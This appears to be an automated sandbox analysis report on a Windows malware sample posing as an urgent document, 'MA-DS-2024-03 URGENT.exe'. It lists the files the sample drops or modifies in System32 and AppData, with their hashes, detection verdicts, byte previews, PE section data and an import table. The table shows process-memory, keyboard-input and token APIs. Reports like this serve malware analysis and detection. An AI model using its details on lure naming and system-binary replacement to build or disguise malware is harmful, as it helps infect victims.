                                                      Preview:.i.PHQ8O68TT.69.APD3SA1.YJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O.8TT?J.72.Y...@}.x.[,#k!J UJ59.6WW\.$dQ6aC=7jZ+p..ko_W01.X;3.APD3SA11XC.x0,../U.i4V.,...j$T.[..vS".Q....X3.c<UQ.!7.3SA1HYJ3..KQtN38....692APD3S.1JXA2NPK.<O28TT1U692TPD3CA1H)N3EP.Q8_28TV1U092APD3SG1HYJ3EPK!<O2:TT1U690A..3SQ1HIJ3EP[Q8_28TT1U&92APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U69.55<GSA1..N3E@KQ8.68TD1U692APD3SA1HYj3E0KQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT1U692APD3SA1HYJ3EPKQ8O28TT

                                                      C:\Users\user\AppData\Roaming\8e8aaae4f259d5dc.bin

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12320
                                                      Entropy (8bit):7.984066687923601
                                                      Encrypted:false
                                                      SSDEEP:384:iWY8uIi/qMpaLMOV2w72wtjAWO3qA9CY/n:L5FM7OV262weWO3N9z
                                                      MD5:D271EE029E1558F5B120B8CA15878013
                                                      SHA1:D67F47B7919DDE852C6B490DBB36FCBFB4DC39F3
                                                      SHA-256:7AA21F69E444570D72B7EF861716EE97797320A8A904611853C3AAB9A9ED4C59
                                                      SHA-512:2836473C247312FDEE32BDD648F8B921B165B5D3896D5F876D76BC69A6AA13530B5281E204AB88C65DDFFE0499732C01E1865211253FF086C1E80C2DBD2C4A38
                                                      Malicious:false
                                                      Preview:l`au...5.6.H:....33.....8..p.T.u...i.;...B..N...P..9...c..R....VX....u@LN..BX[KL..t\.8;HN....#.......B....{D%...M...~.......jf.u...#b.1k.`E...z......PF...F.....4..........QhB...t.S..M..|S... ..R...M.Av#3o0.Z..!}..=EO.V\/.s.;...-[...?xv..../....4b.N....b.?.j.T.-cE.p.=Q..L........wF...G.]...w..DI..a.9...B..h...dE.:...Z.._=....B.$...)*._j.y."L....JA.[.;.._a..u.<.......gsW.<4to..d....{.JN.iX...6..?.DH...$.`.E....z....Kc...rV.N.u.z...r......64T$Ilk.j..B.beA&s....[`..n..JK..a..fwjne....%.+P4".....D..J<...i.:_,.!-t.....q....Q..d.~%k.UW!.J..=T.}_......v.R..#. ...]....e......X...I-]|.F^w...?d...b(..S!.......`...=..&...\._..^N.)J'.~<..:...J............D...M..F..wz...(a.....g.L........:..\.... ..6.s.....#.k..`6_....tI...$/'....x.....DQ.; ...#.!....Z./.yyB...&.....,......T......a...CcU..z.8{.B...^VX.N...X1dI............<l...!.....m..0.....hr...k....+..YR... ..XC!...M...+..9.q.D.(...P.^...5...;.j....u.e.....!..f(w}].k.K..h...+..]..d..6..K..i..K.

                                                      C:\Windows\System32\AppVClient.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1348608
                                                      Entropy (8bit):7.251539764816541
                                                      Encrypted:false
                                                      SSDEEP:24576:TQW4qoNUgslKNX0Ip0MgHCpoMBOuPVg9N9JMlDlfjRiVuVsWt5MJMs:TQW9BKNX0IPgiKMBOu9gFIDRRAubt5M
                                                      MD5:70844A25E3B4375DA206E6793BBE1975
                                                      SHA1:30069F665904A2ED05FEF80A0022F18CB8EB70DC
                                                      SHA-256:1CDDEBB94474C9822C9532E5D7586E9D917D240C75C317330920CA8CDDAA0301
                                                      SHA-512:C40DDC6842C13CC0CC1165CF44C716EA5AD92279BB0DA415157F51EC29E2036E7065C2FADCC6D848AEDD39B725F2EB2F9DFDD7F237139F8CCDBA6C246D139430
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                      C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:modified
                                                      Size (bytes):671232
                                                      Entropy (8bit):7.837233441090614
                                                      Encrypted:false
                                                      SSDEEP:12288:YT6G86AbHjkgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:Y2G7AbHjkMVg9N9JMlDlfjRiVuVsWt5c
                                                      MD5:02AC72471C5BA569ED1524C1BA80604D
                                                      SHA1:73C35EAACCD892E75D860E649DE88B66D84AB561
                                                      SHA-256:75D86C3333958C2DE23FAACA707FD8DB642724D4041E430E01F175408E10F9D3
                                                      SHA-512:360935F074B029D96D6B55C354E2B4B55B11F4BB733C099D527E4FA9FCC0B54EFFF39949CC84361346455533300EDF47A7BE1F3D3A17A53B87B92E018ED0A9E2
                                                      Malicious:true
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@.............................@......K.....`.......... ......................................p?..................................d... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...............n..............@..B........................................................................................................................................................................................................................................................

                                                      C:\Windows\System32\alg.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe
                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1594368
                                                      Entropy (8bit):4.175676227596535
                                                      Encrypted:false
                                                      SSDEEP:12288:mEP3RFLV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:lFBVg9N9JMlDlfjRiVuVsWt5MJMs
                                                      MD5:114ADFAB8A4E69539FC98ABAB86561C6
                                                      SHA1:8A4B074DB9453C7F8839E2A13790175017BDF0DC
                                                      SHA-256:E04ADBCAEF0E9885F235112C0050BB91A2C3FFB4ABAE230DA4FB7701FC06B52F
                                                      SHA-512:B95C6FDC8265A069360037709B0B0CA51C7E02BACE33B8431E927396329C9FD6B2E25A3174A7593140EC7664E9B9027E1DEF4E724CD59AB76B085A5A7C4CE19C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@....................................:y.... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                                                      C:\Windows\System32\config\systemprofile\AppData\Roaming\8e8aaae4f259d5dc.bin

                                                      Download File
                                                      Process:C:\Windows\System32\AppVClient.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):12320
                                                      Entropy (8bit):7.985390058469798
                                                      Encrypted:false
                                                      SSDEEP:384:NvyC70d9Z456jIi5Tvxo3OECKMfD30qV0A:5Ad9Znj9T5qqKMfD3Nf
                                                      MD5:57C98A34F5313662D6E70CCAA70E8E21
                                                      SHA1:81A486D24EB2617A7A9E69F338A03E66CF9BB0FB
                                                      SHA-256:2F703FB726EABADD18B454F2D5A9B10942FEAE4DF003AE4C4325D714B5DE1665
                                                      SHA-512:BDD846584C6AFAF51338ED81721606407143D68B018ED75F9FDEEEA1D8907B414EAB72FC9A05CF0654FF6621D4F00F2C93A799728317F960E0B5EBC08FFD0A82
                                                      Malicious:false
                                                      Preview:Gi......pQ.a..3..j.**.....-....k...O@q.......{a.^....3l.A..Vy.Qb..P.V.`....R..a..V=...b.N!.q.t"..9..>..(T.?..J..h.v......<.../.c]..[H..LN......:.5....KF..?s...0.../..?..l.....].>"@.....?.\.7M..d%..........`....".XK"..8..3(]...-..0.5O.s..B.....5.IF....c.).....q^.B.O9.G.t..2v.CN...j.YDQ.0..pX...&/...T.....g..}....#C..I+> {..}..YBux..V....x..)[....U..#xz.>y................X..=.,bF;.iqh.w.w......@.ll<...C..s...d"6.FC.k.^..v(F:...[)...O.(.f."...F#........y$Lg.T....|*..dM....?..D...=Q....7N....B.+_.Wc...^.&.;....~1.zz.){..P.........O9$..){..J........t.t.}.Q.$z....y........g...........+i.]@r....`W.=-.._..C_....Va..,...O..r.?&..Y9r...........T..|g.:4......6...<BD...v..........9.."|...%>F.d\y.h@).z..t.H>.^9!.....TO...{./w.?.vh..8/..tx...,;..N...8C....veH. .$s.,...[I.m8A."z.B_.A.=..._Y........./`..V....M.v.m...u..S...k.(.U...S..Mo.:....(...CA..P.F...h4.nU|T....A.....#C....E..(.f...O......`....{..E%u;<......X>rf..b.7o.6V.!.m..V0... I..P..a.\.~Y

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.505662525105906
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:MA-DS-2024-03 URGENT.exe
                                                      File size:1'762'304 bytes
                                                      MD5:b5c0bc1ca5223c4b18328235497a2ef6
                                                      SHA1:23836ce6cfd0bf6617527366879bf36fcd9d3e26
                                                      SHA256:ec01b76e956bceeec02a2bf5004ec837639562729f5ea4fd61f2f9f1ea0e803f
                                                      SHA512:3328ebf08f853074396de47469ed2aa9be47e5478cb083dfc43113b5157b0690c8bc9806c475dfa5c71aacaf52f2e848657a9b475668bfdf12ac2e2cd24ce5b7
                                                      SSDEEP:49152:3d0c++OCvkGs9FagQLJjVMYxgFIDRRAubt5M:tB3vkJ97rUf
                                                      TLSH:CC85E02273DDC361CB669173BF29B7056EBF38250630B85B2F940D7DA960172162DBA3
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                      File Icon

                                                      Icon Hash:aaf3e3e3938382a0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x427dcd
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x67584097 [Tue Dec 10 13:22:31 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007FF540B25E8Ah
                                                      jmp 00007FF540B18C54h
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [esp+10h]
                                                      mov ecx, dword ptr [esp+14h]
                                                      mov edi, dword ptr [esp+0Ch]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007FF540B18DDAh
                                                      cmp edi, eax
                                                      jc 00007FF540B1913Eh
                                                      bt dword ptr [004C31FCh], 01h
                                                      jnc 00007FF540B18DD9h
                                                      rep movsb
                                                      jmp 00007FF540B190ECh
                                                      cmp ecx, 00000080h
                                                      jc 00007FF540B18FA4h
                                                      mov eax, edi
                                                      xor eax, esi
                                                      test eax, 0000000Fh
                                                      jne 00007FF540B18DE0h
                                                      bt dword ptr [004BE324h], 01h
                                                      jc 00007FF540B192B0h
                                                      bt dword ptr [004C31FCh], 00000000h
                                                      jnc 00007FF540B18F7Dh
                                                      test edi, 00000003h
                                                      jne 00007FF540B18F8Eh
                                                      test esi, 00000003h
                                                      jne 00007FF540B18F6Dh
                                                      bt edi, 02h
                                                      jnc 00007FF540B18DDFh
                                                      mov eax, dword ptr [esi]
                                                      sub ecx, 04h
                                                      lea esi, dword ptr [esi+04h]
                                                      mov dword ptr [edi], eax
                                                      lea edi, dword ptr [edi+04h]
                                                      bt edi, 03h
                                                      jnc 00007FF540B18DE3h
                                                      movq xmm1, qword ptr [esi]
                                                      sub ecx, 08h
                                                      lea esi, dword ptr [esi+08h]
                                                      movq qword ptr [edi], xmm1
                                                      lea edi, dword ptr [edi+08h]
                                                      test esi, 00000007h
                                                      je 00007FF540B18E35h
                                                      bt esi, 03h
                                                      jnc 00007FF540B18E88h

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2013 build 21005
                                                      • [ C ] VS2013 build 21005
                                                      • [C++] VS2013 build 21005
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      • [ASM] VS2013 UPD4 build 31101
                                                      • [RES] VS2013 build 21005
                                                      • [LNK] VS2013 UPD4 build 31101

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x57c8c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x8dcc40x8de003de9cc8884ce5b00bc2079b745b786a7False0.5728679102422908data6.676133860974604IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xc70000x57c8c0x57e00591bb4c19cdc8a0e82b18e516a6dcbb1False0.9246643847795164data7.88882752659976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x11f0000x960000x95000743db71085d1f9d387eba8e73a38cbc1False0.9757563443791947data7.938039574595139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                      RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                      RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                      RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                      RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcf7b80x4ef54data1.0003277553090175
                                                      RT_GROUP_ICON0x11e70c0x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x11e7840x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x11e7980x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x11e7ac0x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x11e7c00xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x11e89c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                      Imports

                                                      DLLImport
                                                      WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                      VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
